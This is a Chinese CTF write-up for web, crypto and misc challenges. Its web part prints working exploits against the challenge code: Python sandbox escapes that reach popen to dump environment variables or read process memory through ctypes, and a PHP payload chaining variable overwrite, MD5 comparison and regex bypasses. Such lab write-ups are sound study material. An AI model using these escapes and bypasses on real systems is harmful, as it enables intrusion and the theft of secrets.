Web

菜狗工具#1

源码:

from flask import *
import io
import os

app = Flask(__name__)
black_list = [
    '__build_class__', '__debug__', '__doc__', '__import__', 
    '__loader__', '__name__', '__package__', '__spec__', 'SystemExit',
    'breakpoint', 'compile', 'exit', 'memoryview', 'open', 'quit', 'input'
]
new_builtins = dict([
    (key, val) for key, val in __builtins__.__dict__.items() if key not in black_list
])

flag = "flag{xxxxxxxxx}"

@app.route("/")
def index():
    return redirect("/static/index.html")

@app.post("/run")
def run():
    out = io.StringIO()
    script = str(request.form["script"])
    
    def wrap_print(*args, **kwargs):
        kwargs["file"] = out
        print(*args, **kwargs)
    new_builtins["print"] = wrap_print

    try:
        exec(script, {"__builtins__": new_builtins})
    except Exception as e:
        wrap_print(e)
    
    ret = out.getvalue()
    out.close()
    return ret

app.run('0.0.0.0', port=9001)

把这个题当成一个SSTI去做就可以了(

exp:

a="".__class__.__bases__[0].__subclasses__()[132].__init__.__globals__['popen']("env").read()
print(a)

ezPHP

源码:

<?php
include "flag.php";
highlight_file(__FILE__);
error_reporting(0);

$a = 'O.U.C';

$query = $_SERVER['QUERY_STRING'];
parse_str($query);
if (preg_match('/_|%5f|\.|%2E/i',$query)){
    die('听说你是黑客');
}

echo '你知道b等于什么能绕过这个弱类型吗(〃` 3′〃)'.'<br>';
if (md5($a)==md5($_GET['b'])&&$a!=$_GET['b']){
    echo "哎呦,不错喔".'<br>';
    $O_U_C=$_GET['O_U_C'];
    if (!is_array($O_U_C)&&$O_U_C!=='100'&&preg_match('/^100$/',$O_U_C)){
        echo 'but'.'如果我寄出===阁下又该如何应对๑乛◡乛๑'.'<br>';
        if (md5($_POST['md51'])===md5($_POST['md52'])&&$_POST['md51']!=$_POST['md52']){
            echo '好,那么好'.'<br>';
            if ($_COOKIE["md5"]===md5($secret.urldecode($_GET['md5']))){
                echo '还是被你解出来了'.' ྀི ྀིɞ ྀི ིྀ ིྀ'.$flag;
            }else{
                echo '告诉你secret的md5值也无妨,反正哈希是不可逆的๑乛◡乛๑,除非你能箨斩攻击我'.md5($secret.'ouc').'<br>';
            }
        }else{
            echo '不过如此';
        }
    }else{
        die("不行嘛(´ェ`)");
    }
}else{
    echo '嗨害嗨  (๑ᵒ̴̶̷͈᷄ᗨᵒ̴̶̷͈᷅)';
}

存在变量覆盖,把$a覆盖成想要的值绕过MD5弱比较。

接着是 !is_array($O_U_C)&&$O_U_C!=='100'&&preg_match('/^100$/',$O_U_C),用%0a绕过 preg_match('/^100$/',$O_U_C)的判断。

MD5强碰撞用数组绕过

$_COOKIE["md5"]===md5($secret.urldecode($_GET['md5'])),因为给了md5($secret.'ouc'),因此cookie带上这个值,$_GET['md5']ouc即可。

payload:

GET: a=QNKCDZO&b=s878926199a&O+U+C=100%0a&md5=ouc

POST: md51[]=1&md52[]=2

Cookie: md5=06d92f344c7d8c89cb164353ca0fa070

菜狗工具#2

源码:

from flask import *
import io
import time

app = Flask(__name__)
black_list = [
    '__build_class__', '__debug__', '__doc__', '__import__', 
    '__loader__', '__name__', '__package__', '__spec__', 'SystemExit',
    'breakpoint', 'compile', 'exit', 'memoryview', 'open', 'quit', 'input'
]
new_builtins = dict([
    (key, val) for key, val in __builtins__.__dict__.items() if key not in black_list
])

flag = "flag{xxxxxx}"
flag = "DISPOSED"

@app.route("/")
def index():
    return redirect("/static/index.html")

@app.post("/run")
def run():
    out = io.StringIO()
    script = str(request.form["script"])
    
    def wrap_print(*args, **kwargs):
        kwargs["file"] = out
        print(*args, **kwargs)
    new_builtins["print"] = wrap_print

    try:
        exec(script, {"__builtins__": new_builtins})
    except Exception as e:
        wrap_print(e)
    
    ret = out.getvalue()
    out.close()
    return ret

time.sleep(5) # current source file is deleted
app.run('0.0.0.0', port=9001)

源码和一差不多,只不过这次是运行后源码被删除了。

参考链接: L3HCTF Just a pyjail

大致思路:

  1. 源码被删除,但程序运行了,内存里肯定是有源码的。
  2. 没有 /proc目录,不能通过读文件的方式读内存(参考session伪造利用文件任意读取读取key)
  3. 可以利用指针,把内存的内容读出来,但需要定位一个大致的范围,盲目读取浪费时间。

先利用栈帧逃逸到全局,后续需要用到全局的flag的地址。

接着是利用 ctypes模块的指针,将flag地址周围的值读一下,实现一个从内存读源码的操作。

这里我用了char 指针,读出来的是一个字符串,再加上flag头作为判断,可以很快读出flag。

每次位移8的倍数。(可以自行对比任意两个变量的地址,可以发现它们的差值都是8的倍数)

exp:

def f():
    yield g.gi_frame.f_back.f_back

g = f()
frame = [x for x in g][0]
b = frame.f_back.f_globals
flag_id=id(b['flag'])
ctypes = b["__builtins__"].__import__('ctypes')
#print(ctypes)

for i in range(10000):
	txt = ctypes.cast((flag_id-8*i),ctypes.c_char_p).value
	if b"flag{" in txt:
		print(txt)
		break

贪吃蛇

wasm逆向和debug。

参考链接: WebAssembly

在线网站:wat2wasm demo

先debug,找一个吃到道具能进入debug的断点,然后一直往下找,可以看到 114514 的赋值过程

我这里是把断点打在 call $wbg.__wbg_crypto_d05b68a3572bb8ca

一直往下追,可以看到 114514 的转换代码。

修改这部分代码,然后通过在线工具把它再转回 wasm ,之后再用新的 wasm debug。

这里我把 $var16 改成 0

loop $label8
local.get $var16
i64.const 0
i64.add
local.set $var16
local.get $var1
i32.const 4
i32.add
local.set $var1
local.get $var3
i32.const 1
i32.sub
local.tee $var3
br_if $label8
end $label8

编译得到wasm,回到本地调试,先在本地用python起一个http服务

python -m http.server -b localhost

接着访问 localhost:8000 即可得到flag

爆率真的高

在线网站:JavaScript Deobfuscator

通过在线网站反混淆可以得到比较简洁的源码

function _0x36f7d7() {
  var _0x2b390b = function () {
      var _0xc52e83 = true;
      return function (_0x25d063, _0x14b0af) {
        var _0x435e43 = _0xc52e83 ? function () {
          if (_0x14b0af) {
            var _0x278c9e = _0x14b0af['apply'](_0x25d063, arguments);
            return _0x14b0af = null, _0x278c9e;
          }
        } : function () {};
        return _0xc52e83 = false, _0x435e43;
      };
    }(),
    _0x12600c = _0x2b390b(this, function () {
      return _0x12600c['toString']()['search']('(((.+)+)+)+$')['toString']()['constructor'](_0x12600c)['search']('(((.+)+)+)+$');
    });
  return _0x12600c(), 'line-height:200px; padding-block:100px; padding-left:200px; background-repeat:no-repeat;background-image:url("data:image/svg+xml,%3Csvg xmlns=\'http://www.w3.org/2000/svg\' viewBox=\'0 0 200 200\'%3E%3Cstyle%3E .wrapper %7B font-family: sans-serif; perspective: 500px; text-align: center; position: relative; width: 100%25; height: 100%25; %7D .cube %7B position: absolute; top: 20%25; left: 30%25; transform-style: preserve-3d; transform: rotateY(40deg) rotateX(-40deg); animation: wiggle_wiggle_wiggle_wiggle_wiggle_yeah 3s ease-in-out infinite alternate; %7D .side %7B width: 8rem; height: 8rem; background: rgba(0, 0, 0, 0.8); display: inline-block; position: absolute; line-height: 8rem; color: %23fff; text-align: center; box-sizing: border-box; border: 3px solid %23f00; font-size: 4rem; %7D .front %7B transform: translateZ(4rem); z-index: 1; %7D .back %7B transform: rotateY(180deg) translateZ(4rem); %7D .left %7B transform: rotateY(-90deg) translateZ(4rem); z-index: 1; %7D .right %7B transform: rotateY(90deg) translateZ(4rem); %7D .top %7B transform: rotateX(90deg) translateZ(4rem); %7D .bottom %7B transform: rotateX(-90deg) translateZ(4rem); %7D @keyframes wiggle_wiggle_wiggle_wiggle_wiggle_yeah %7B 0%25 %7B transform: rotateY({a}deg) rotateX(-{a}deg); %7D 100%25 %7B transform: rotateY({b}deg) rotateX(-{b}deg); %7D %7D %3C/style%3E%3CforeignObject width=\'100%25\' height=\'100%25\'%3E%3Cdiv xmlns=\'http://www.w3.org/1999/xhtml\' class=\'wrapper\'%3E%3Cdiv class=\'cube\'%3E%3Cdiv class=\'side front\'%3E1%3C/div%3E%3Cdiv class=\'side back\'%3E2%3C/div%3E%3Cdiv class=\'side left\'%3E3%3C/div%3E%3Cdiv class=\'side right\'%3E4%3C/div%3E%3Cdiv class=\'side top\'%3E5%3C/div%3E%3Cdiv class=\'side bottom\'%3E6%3C/div%3E%3C/div%3E%3C/div%3E%3C/foreignObject%3E%3C/svg%3E")||line-height:50px; padding-left:500px; background-repeat:no-repeat;background-image:url("data:image/svg+xml,%3Csvg xmlns=\'http://www.w3.org/2000/svg\'%3E %3Cpath id=\'path1394\' style=\'fill:none%3Bstroke:%23000000%3Bstroke-width:0.264583px%3Bstroke-linecap:butt%3Bstroke-linejoin:miter%3Bstroke-opacity:1\' d=\'m 221.50185,6.5147602 3.99292,2.94215 0.4203,14.0802888 3.78277,2.521842 -3.78277,2.731996 -0.21015,14.500595 -3.99292,2.942151 m -75.76812,-32.68897 -0.18289,26.152093 4.20628,-0.18288 0.18289,-0.365766 m 39.51762,-10.582347 v 7.863917 l 2.19458,2.926109 h 8.04679 l 2.74323,-3.108992 -0.36576,-7.498151 -1.82882,-3.474754 -8.22968,-0.182882 z m 17.49855,11.609045 -0.18288,-12.070196 2.56034,-3.840517 6.76663,0.182882 2.37746,3.474755 0.18288,12.253076 v 0 M 79.249122,29.337219 v 7.863917 l 2.19458,2.926109 h 8.04679 l 2.74323,-3.108992 -0.36576,-7.498151 -1.82882,-3.474754 -8.22968,-0.182882 z m 106.868818,-7.460739 -10.0585,0.731527 -3.10899,7.315272 0.73153,5.852215 2.74322,3.108989 8.77833,0.182883 0.73152,-0.182883 m -29.84386,-8.105803 8.77833,-0.365762 2.0117,-2.743227 -2.37747,-3.291872 h -8.9612 l -2.19458,4.0234 0.18288,7.863914 3.29187,2.560347 8.0468,-0.365766 m -36.86029,-9.455308 v 7.863917 l 2.19458,2.926109 h 8.04679 l 2.74323,-3.108992 -0.36576,-7.498151 -1.82882,-3.474754 -8.22968,-0.182882 z m -5.20252,-3.51165 -7.58959,-0.182882 -2.28602,3.931959 V 32.0765 l 8.86976,0.182882 1.5545,1.554493 -0.27433,4.206283 -1.46305,2.377461 -8.32112,0.09144 h 0.4572 m -17.006391,0.457205 -0.18288,-12.070196 2.56034,-3.840517 6.766631,0.182882 2.37746,3.474755 0.18288,12.253076 v 0 m -32.373283,-17.720279 -10.058498,0.731527 -3.108989,7.315272 0.731526,5.852215 2.743226,3.108989 8.778325,0.182883 0.731528,-0.182883 m -15.544951,1.645936 0.731528,0.365766 -4.0234,-2.926109 L 56.87623,24.689039 53.401478,22.128694 57.607759,18.836823 57.241995,6.5837438 59.985222,3.4747537 m -17.008004,34.0160083 8.961204,-0.18288 v 0 m -8.961204,0.18288 -0.182883,-10.058495 9.144087,-0.182883 v 22.860222 h -8.961204 l 0.548645,-0.365765 H 43.34298 m -15.54495,-27.98091 5.852215,-0.182882 0.182883,16.276478 m -0.365763,-10.790025 -7.13239,0.182882 V 38.22229 l 12.43596,-0.365763 V 37.490762 M 19.202586,12.43596 l -0.182882,26.152093 4.206281,-0.18288 0.182882,-0.365766 M 14.996305,12.618842 H 10.241379 L 10.058498,38.039407 5.8522165,37.856527 M 3.8405173,22.67734 15.910714,22.494458\' %2F%3E %3C%2Fsvg%3E")||console.log||console.clear||Math.random||Math.floor||setTimeout';
}
var _0x4d032d = eval(_0x36f7d7()['split']('||')[2]),
  _0x4d3fb4 = eval(_0x36f7d7()['split']('||')[3]),
  _0x280bbf = eval(_0x36f7d7()['split']('||')[4]),
  _0x3ede16 = eval(_0x36f7d7()['split']('||')[5]),
  _0x13a155 = eval(_0x36f7d7()['split']('||')[6]);
(function (_0x5da15b) {
  return _0x5da15b(_0x5da15b);
})(function (_0xc4be8d) {
  return function (_0x3a3176) {
    for (var _0x7936d0 = 0; _0x7936d0 < 100; _0x7936d0++) {
      var _0x38d961 = false,
        _0x48b8aa = _0x36f7d7()['split']('||')[0],
        _0x48a4aa = 60 * _0x7936d0 / 100,
        _0x54870d = 60 - 60 * _0x7936d0 / 100;
      _0x280bbf() >= 0.9999 && (_0x48b8aa = _0x36f7d7()['split']('||')[1], _0x38d961 = true);
      _0x4d032d('%c ', _0x48b8aa['replace'](/\{a\}/gm, _0x48a4aa + '')['replace'](/\{b\}/gm, _0x54870d + ''));
      if (_0x38d961) _0x4d3fb4();
    }
    _0x13a155(function () {
      _0xc4be8d(_0xc4be8d)();
    }, 500), _0x13a155(_0x4d3fb4, 450);
  };
})();

通过分析,可以知道当 Math.random>= 0.9999 时,会输出flag,手动调整一下代码,即可得到flag。

var _0x36f7d7 = 'line-height:200px; padding-block:100px; padding-left:200px; background-repeat:no-repeat;background-image:url("data:image/svg+xml,%3Csvg xmlns=\'http://www.w3.org/2000/svg\' viewBox=\'0 0 200 200\'%3E%3Cstyle%3E .wrapper %7B font-family: sans-serif; perspective: 500px; text-align: center; position: relative; width: 100%25; height: 100%25; %7D .cube %7B position: absolute; top: 20%25; left: 30%25; transform-style: preserve-3d; transform: rotateY(40deg) rotateX(-40deg); animation: wiggle_wiggle_wiggle_wiggle_wiggle_yeah 3s ease-in-out infinite alternate; %7D .side %7B width: 8rem; height: 8rem; background: rgba(0, 0, 0, 0.8); display: inline-block; position: absolute; line-height: 8rem; color: %23fff; text-align: center; box-sizing: border-box; border: 3px solid %23f00; font-size: 4rem; %7D .front %7B transform: translateZ(4rem); z-index: 1; %7D .back %7B transform: rotateY(180deg) translateZ(4rem); %7D .left %7B transform: rotateY(-90deg) translateZ(4rem); z-index: 1; %7D .right %7B transform: rotateY(90deg) translateZ(4rem); %7D .top %7B transform: rotateX(90deg) translateZ(4rem); %7D .bottom %7B transform: rotateX(-90deg) translateZ(4rem); %7D @keyframes wiggle_wiggle_wiggle_wiggle_wiggle_yeah %7B 0%25 %7B transform: rotateY({a}deg) rotateX(-{a}deg); %7D 100%25 %7B transform: rotateY({b}deg) rotateX(-{b}deg); %7D %7D %3C/style%3E%3CforeignObject width=\'100%25\' height=\'100%25\'%3E%3Cdiv xmlns=\'http://www.w3.org/1999/xhtml\' class=\'wrapper\'%3E%3Cdiv class=\'cube\'%3E%3Cdiv class=\'side front\'%3E1%3C/div%3E%3Cdiv class=\'side back\'%3E2%3C/div%3E%3Cdiv class=\'side left\'%3E3%3C/div%3E%3Cdiv class=\'side right\'%3E4%3C/div%3E%3Cdiv class=\'side top\'%3E5%3C/div%3E%3Cdiv class=\'side bottom\'%3E6%3C/div%3E%3C/div%3E%3C/div%3E%3C/foreignObject%3E%3C/svg%3E")||line-height:50px; padding-left:500px; background-repeat:no-repeat;background-image:url("data:image/svg+xml,%3Csvg xmlns=\'http://www.w3.org/2000/svg\'%3E %3Cpath id=\'path1394\' style=\'fill:none%3Bstroke:%23000000%3Bstroke-width:0.264583px%3Bstroke-linecap:butt%3Bstroke-linejoin:miter%3Bstroke-opacity:1\' d=\'m 221.50185,6.5147602 3.99292,2.94215 0.4203,14.0802888 3.78277,2.521842 -3.78277,2.731996 -0.21015,14.500595 -3.99292,2.942151 m -75.76812,-32.68897 -0.18289,26.152093 4.20628,-0.18288 0.18289,-0.365766 m 39.51762,-10.582347 v 7.863917 l 2.19458,2.926109 h 8.04679 l 2.74323,-3.108992 -0.36576,-7.498151 -1.82882,-3.474754 -8.22968,-0.182882 z m 17.49855,11.609045 -0.18288,-12.070196 2.56034,-3.840517 6.76663,0.182882 2.37746,3.474755 0.18288,12.253076 v 0 M 79.249122,29.337219 v 7.863917 l 2.19458,2.926109 h 8.04679 l 2.74323,-3.108992 -0.36576,-7.498151 -1.82882,-3.474754 -8.22968,-0.182882 z m 106.868818,-7.460739 -10.0585,0.731527 -3.10899,7.315272 0.73153,5.852215 2.74322,3.108989 8.77833,0.182883 0.73152,-0.182883 m -29.84386,-8.105803 8.77833,-0.365762 2.0117,-2.743227 -2.37747,-3.291872 h -8.9612 l -2.19458,4.0234 0.18288,7.863914 3.29187,2.560347 8.0468,-0.365766 m -36.86029,-9.455308 v 7.863917 l 2.19458,2.926109 h 8.04679 l 2.74323,-3.108992 -0.36576,-7.498151 -1.82882,-3.474754 -8.22968,-0.182882 z m -5.20252,-3.51165 -7.58959,-0.182882 -2.28602,3.931959 V 32.0765 l 8.86976,0.182882 1.5545,1.554493 -0.27433,4.206283 -1.46305,2.377461 -8.32112,0.09144 h 0.4572 m -17.006391,0.457205 -0.18288,-12.070196 2.56034,-3.840517 6.766631,0.182882 2.37746,3.474755 0.18288,12.253076 v 0 m -32.373283,-17.720279 -10.058498,0.731527 -3.108989,7.315272 0.731526,5.852215 2.743226,3.108989 8.778325,0.182883 0.731528,-0.182883 m -15.544951,1.645936 0.731528,0.365766 -4.0234,-2.926109 L 56.87623,24.689039 53.401478,22.128694 57.607759,18.836823 57.241995,6.5837438 59.985222,3.4747537 m -17.008004,34.0160083 8.961204,-0.18288 v 0 m -8.961204,0.18288 -0.182883,-10.058495 9.144087,-0.182883 v 22.860222 h -8.961204 l 0.548645,-0.365765 H 43.34298 m -15.54495,-27.98091 5.852215,-0.182882 0.182883,16.276478 m -0.365763,-10.790025 -7.13239,0.182882 V 38.22229 l 12.43596,-0.365763 V 37.490762 M 19.202586,12.43596 l -0.182882,26.152093 4.206281,-0.18288 0.182882,-0.365766 M 14.996305,12.618842 H 10.241379 L 10.058498,38.039407 5.8522165,37.856527 M 3.8405173,22.67734 15.910714,22.494458\' %2F%3E %3C%2Fsvg%3E")||console.log||console.clear||Math.random||Math.floor||setTimeout';


var _0x38d961 = false,
_0x48b8aa = _0x36f7d7['split']('||')[1],
_0x48a4aa = 60 * 0 / 100,
_0x54870d = 60 - 60 * 0 / 100;
//console.log(_0x48b8aa);
console.log('%c ', _0x48b8aa['replace'](/\{a\}/gm, _0x48a4aa + '')['replace'](/\{b\}/gm, _0x54870d + ''));


// flag{consolecon}

Crypto

NeXT RSA

源码:

import sympy
import libnum

flag="flag{" + "???" + "}"
m = libnum.s2n(flag)

p = sympy.randprime(1<<1024, 1<<1025)
q = sympy.nextprime(p)

n = p*q
r = (p-1)*(q-1)
e = 65537

c = pow(m, e, n)

print(n, e, c)
# output:
# 80044118049755180996754407858488943779355738585718372337839486032339412481191013051614126608584578841408197524632831442032118319629160505851518198448787590483634506563248531254421862061651099856312546562506221294620627871718678484548245902274972044599314097339549053518589561289734819710218838311181044519738709148493164321955860982700783886286661558574861608455547990794798848491695189544811325833194530596317989718866319530140199263278168146224240677087191093183415595617994125075880280632369616506148501757653260154487000183157405531772172082897743929126980157956142627803176227942226654177011633301413616266656761 65537 23280133104463252598665779150831148192014617461904564929071121215373331248942762386170411274023248423328388793808975632652896384007449549469345318875514363621903138122407682293848670093433946555776164835208375667498606187869211466397624286383057425296636315379314349307816391315242971306898487494604324473266965665471735612154916305882443496151118031672777088597821127499085632141307413890900246444539517971766135909771880642211582699957211983212981047822362311969553832913399476190919026666192056319334425636757404603336130688707109219644178606626422717046059209499394056295682594928581470210114322505904198054215544

p,q很接近,用 yafu 分解得到p和q即可解出flag。

import gmpy2
from Crypto.Util.number import long_to_bytes
 
p = 282920692155514106003547048252671592686895074005075494866237126606538876862084869899305020449888011718393569492453806569130653155089937273700159218521084322216860665654750144997585080033855855153273003202489776223708632688666001227407722693831850421351342688928312148753704357824181010753634918089083718774469

q = 282920692155514106003547048252671592686895074005075494866237126606538876862084869899305020449888011718393569492453806569130653155089937273700159218521084322216860665654750144997585080033855855153273003202489776223708632688666001227407722693831850421351342688928312148753704357824181010753634918089083718773669


n=p*q

e = 65537
#填c
c=23280133104463252598665779150831148192014617461904564929071121215373331248942762386170411274023248423328388793808975632652896384007449549469345318875514363621903138122407682293848670093433946555776164835208375667498606187869211466397624286383057425296636315379314349307816391315242971306898487494604324473266965665471735612154916305882443496151118031672777088597821127499085632141307413890900246444539517971766135909771880642211582699957211983212981047822362311969553832913399476190919026666192056319334425636757404603336130688707109219644178606626422717046059209499394056295682594928581470210114322505904198054215544

d = gmpy2.invert(e, (p - 1) * (q - 1))
m = pow(c, d, n)
flag = long_to_bytes(m)
print(flag)
# flag{n0t_s3Cure_4t_aIl}

Base64*rot13

CyberChef 梭了。

模!

源码:

from math import factorial
from functools import reduce

flag = "flag{xxxxxxxxx}"

def mooooo(s: str):
    res = 0
    for i in s:
        res <<= 8
        res += ( factorial(ord(i)) % 233 )
    return res

table = "abcdefghijklmnopqrstuvwxyz{}"
assert(reduce(lambda p,i:(i in table)*p, flag, True))

print(mooooo(flag))
# output: 2508450541438803643416583335895451914701844680466330955847

爆破每一位即可。

from math import factorial

res = 2508450541438803643416583335895451914701844680466330955847
table = "abcdefghijklmnopqrstuvwxyz{}"

bin_res = "0"+bin(res)[2:]

table_num = {(factorial(ord(i)) % 233):i for i in table}
#print(table_num)

for i in range((len(bin_res))//8):
    f1 = int(bin_res[8*i:8*(i+1)],2)
    print(table_num[f1],end='')
 
# flag{dalaodalaohaolihai}

Misc

一眼盯帧

仔细看视频,发现视频在有些帧里面藏了东西。先把特殊的帧提取出来。

import cv2
import numpy as np
import matplotlib.pyplot as plt

video = cv2.VideoCapture('iGotSmokynomial.mp4')

frame_count = 0

def get_background_color(image_path):
    image = cv2.imread(image_path)
    gray_image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
    hist = cv2.calcHist([gray_image], [0], None, [256], [0,256])
    hist = hist.flatten()
    threshold = np.argmax(hist)
    return threshold

while True:
    ret, frame = video.read()
    if not ret:
        break
    cv2.imwrite(f'./out/frame_{frame_count}.jpg', frame)
    if get_background_color(f'./out/frame_{frame_count}.jpg') == 255:
        frame_count += 1

video.release()
cv2.destroyAllWindows()

之后得到62张藏有算式的图片,把图片上的文字提取出来。

import easyocr 
def read_num(filename):
    result = reader.readtext(filename,detail = 0) 
    cnt = 1
    flag = ""
    for i in result:
        if '*' in i:
            if cnt !=1:
                flag+=' + '
            flag += i.split('*')[0]+' * '+'a'+str(cnt)
            cnt+=1

    return flag,result[-1]

reader = easyocr.Reader(['ch_sim','en'],gpu = False) 

f = open('out.txt','w')
for i in range(62): 
    a , b = read_num(f'./out/frame_{i}.jpg')
    f.write(a + ' == ' + b + '\n')
 
f.close()

提取出来的文字并不完全正确,部分0识别成8了,手动修正,只需要检查0对不对。

因为有31个未知数,至少检查31个算式即可,我这里检查了32个,方便校错。

40 * a1 + 42 * a2 + 69 * a3 + 91 * a4 + 91 * a5 + 74 * a6 + 45 * a7 + 49 * a8 + 99 * a9 + 41 * a10 + 79 * a11 + 26 * a12 + 51 * a13 + 74 * a14 + 84 * a15 + 31 * a16 + 74 * a17 + 11 * a18 + 87 * a19 + 76 * a20 + 26 * a21 + 40 * a22 + 13 * a23 + 31 * a24 + 39 * a25 + 7 * a26 + 84 * a27 + 65 * a28 + 25 * a29 + 88 * a30 + 13 * a31 == 159700
76 * a1 + 23 * a2 + 47 * a3 + 95 * a4 + 56 * a5 + 94 * a6 + 9 * a7 + 89 * a8 + 1 * a9 + 27 * a10 + 64 * a11 + 54 * a12 + 77 * a13 + 57 * a14 + 11 * a15 + 80 * a16 + 61 * a17 + 98 * a18 + 14 * a19 + 72 * a20 + 67 * a21 + 98 * a22 + 66 * a23 + 26 * a24 + 11 * a25 + 36 * a26 + 94 * a27 + 66 * a28 + 99 * a29 + 64 * a30 + 40 * a31 == 171444
49 * a1 + 38 * a2 + 20 * a3 + 28 * a4 + 36 * a5 + 44 * a6 + 85 * a7 + 48 * a8 + 74 * a9 + 73 * a10 + 27 * a11 + 99 * a12 + 21 * a13 + 72 * a14 + 89 * a15 + 3 * a16 + 3 * a17 + 72 * a18 + 71 * a19 + 29 * a20 + 92 * a21 + 19 * a22 + 42 * a23 + 87 * a24 + 97 * a25 + 36 * a26 + 84 * a27 + 56 * a28 + 96 * a29 + 40 * a30 + 82 * a31 == 164206
81 * a1 + 88 * a2 + 41 * a3 + 98 * a4 + 8 * a5 + 70 * a6 + 19 * a7 + 85 * a8 + 37 * a9 + 64 * a10 + 24 * a11 + 96 * a12 + 94 * a13 + 78 * a14 + 81 * a15 + 38 * a16 + 10 * a17 + 87 * a18 + 75 * a19 + 35 * a20 + 7 * a21 + 98 * a22 + 63 * a23 + 37 * a24 + 4 * a25 + 40 * a26 + 13 * a27 + 83 * a28 + 99 * a29 + 61 * a30 + 60 * a31 == 171511
53 * a1 + 39 * a2 + 10 * a3 + 36 * a4 + 37 * a5 + 42 * a6 + 69 * a7 + 66 * a8 + 22 * a9 + 33 * a10 + 34 * a11 + 4 * a12 + 77 * a13 + 94 * a14 + 51 * a15 + 87 * a16 + 3 * a17 + 34 * a18 + 44 * a19 + 17 * a20 + 48 * a21 + 31 * a22 + 62 * a23 + 15 * a24 + 59 * a25 + 39 * a26 + 42 * a27 + 48 * a28 + 63 * a29 + 44 * a30 + 84 * a31 == 131705
95 * a1 + 37 * a2 + 70 * a3 + 10 * a4 + 72 * a5 + 37 * a6 + 26 * a7 + 11 * a8 + 89 * a9 + 36 * a10 + 80 * a11 + 81 * a12 + 13 * a13 + 84 * a14 + 79 * a15 + 69 * a16 + 15 * a17 + 53 * a18 + 52 * a19 + 92 * a20 + 13 * a21 + 44 * a22 + 33 * a23 + 48 * a24 + 77 * a25 + 40 * a26 + 50 * a27 + 20 * a28 + 9 * a29 + 69 * a30 + 44 * a31 == 149011
58 * a1 + 53 * a2 + 93 * a3 + 4 * a4 + 33 * a5 + 76 * a6 + 88 * a7 + 7 * a8 + 21 * a9 + 24 * a10 + 8 * a11 + 35 * a12 + 64 * a13 + 54 * a14 + 20 * a15 + 1 * a16 + 4 * a17 + 42 * a18 + 29 * a19 + 96 * a20 + 40 * a21 + 22 * a22 + 39 * a23 + 47 * a24 + 4 * a25 + 42 * a26 + 31 * a27 + 69 * a28 + 39 * a29 + 6 * a30 + 50 * a31 == 114939
89 * a1 + 73 * a2 + 43 * a3 + 41 * a4 + 28 * a5 + 19 * a6 + 83 * a7 + 32 * a8 + 65 * a9 + 37 * a10 + 22 * a11 + 22 * a12 + 42 * a13 + 74 * a14 + 43 * a15 + 72 * a16 + 4 * a17 + 94 * a18 + 66 * a19 + 60 * a20 + 63 * a21 + 91 * a22 + 69 * a23 + 7 * a24 + 39 * a25 + 96 * a26 + 76 * a27 + 5 * a28 + 32 * a29 + 57 * a30 + 22 * a31 == 147181
76 * a1 + 83 * a2 + 10 * a3 + 31 * a4 + 18 * a5 + 2 * a6 + 2 * a7 + 65 * a8 + 27 * a9 + 47 * a10 + 63 * a11 + 61 * a12 + 77 * a13 + 38 * a14 + 22 * a15 + 49 * a16 + 4 * a17 + 2 * a18 + 63 * a19 + 24 * a20 + 16 * a21 + 36 * a22 + 48 * a23 + 50 * a24 + 40 * a25 + 78 * a26 + 19 * a27 + 95 * a28 + 73 * a29 + 47 * a30 + 56 * a31 == 128931
93 * a1 + 3 * a2 + 86 * a3 + 90 * a4 + 97 * a5 + 11 * a6 + 66 * a7 + 69 * a8 + 96 * a9 + 62 * a10 + 40 * a11 + 58 * a12 + 25 * a13 + 64 * a14 + 50 * a15 + 65 * a16 + 59 * a17 + 5 * a18 + 7 * a19 + 55 * a20 + 92 * a21 + 29 * a22 + 35 * a23 + 83 * a24 + 59 * a25 + 55 * a26 + 51 * a27 + 62 * a28 + 1 * a29 + 64 * a30 + 12 * a31 == 159474
60 * a1 + 19 * a2 + 66 * a3 + 62 * a4 + 42 * a5 + 86 * a6 + 61 * a7 + 63 * a8 + 56 * a9 + 2 * a10 + 46 * a11 + 7 * a12 + 7 * a13 + 2 * a14 + 16 * a15 + 97 * a16 + 12 * a17 + 28 * a18 + 11 * a19 + 92 * a20 + 26 * a21 + 64 * a22 + 63 * a23 + 62 * a24 + 45 * a25 + 56 * a26 + 50 * a27 + 97 * a28 + 62 * a29 + 71 * a30 + 65 * a31 == 146558
6 * a1 + 78 * a2 + 51 * a3 + 74 * a4 + 1 * a5 + 25 * a6 + 41 * a7 + 99 * a8 + 52 * a9 + 74 * a10 + 30 * a11 + 97 * a12 + 63 * a13 + 2 * a14 + 25 * a15 + 76 * a16 + 56 * a17 + 35 * a18 + 28 * a19 + 34 * a20 + 40 * a21 + 18 * a22 + 65 * a23 + 67 * a24 + 43 * a25 + 78 * a26 + 6 * a27 + 54 * a28 + 38 * a29 + 45 * a30 + 81 * a31 == 146290
58 * a1 + 47 * a2 + 72 * a3 + 43 * a4 + 99 * a5 + 36 * a6 + 89 * a7 + 31 * a8 + 61 * a9 + 66 * a10 + 59 * a11 + 74 * a12 + 32 * a13 + 2 * a14 + 39 * a15 + 73 * a16 + 86 * a17 + 63 * a18 + 18 * a19 + 92 * a20 + 44 * a21 + 67 * a22 + 37 * a23 + 66 * a24 + 25 * a25 + 32 * a26 + 59 * a27 + 31 * a28 + 11 * a29 + 41 * a30 + 65 * a31 == 157439
79 * a1 + 18 * a2 + 22 * a3 + 73 * a4 + 21 * a5 + 76 * a6 + 5 * a7 + 27 * a8 + 36 * a9 + 22 * a10 + 90 * a11 + 23 * a12 + 20 * a13 + 88 * a14 + 77 * a15 + 18 * a16 + 10 * a17 + 14 * a18 + 80 * a19 + 1 * a20 + 96 * a21 + 97 * a22 + 41 * a23 + 90 * a24 + 53 * a25 + 20 * a26 + 41 * a27 + 2 * a28 + 87 * a29 + 8 * a30 + 40 * a31 == 127198
11 * a1 + 79 * a2 + 17 * a3 + 68 * a4 + 26 * a5 + 38 * a6 + 23 * a7 + 78 * a8 + 82 * a9 + 71 * a10 + 46 * a11 + 18 * a12 + 20 * a13 + 19 * a14 + 89 * a15 + 86 * a16 + 20 * a17 + 54 * a18 + 47 * a19 + 15 * a20 + 62 * a21 + 49 * a22 + 97 * a23 + 75 * a24 + 17 * a25 + 76 * a26 + 52 * a27 + 62 * a28 + 65 * a29 + 89 * a30 + 80 * a31 == 158569
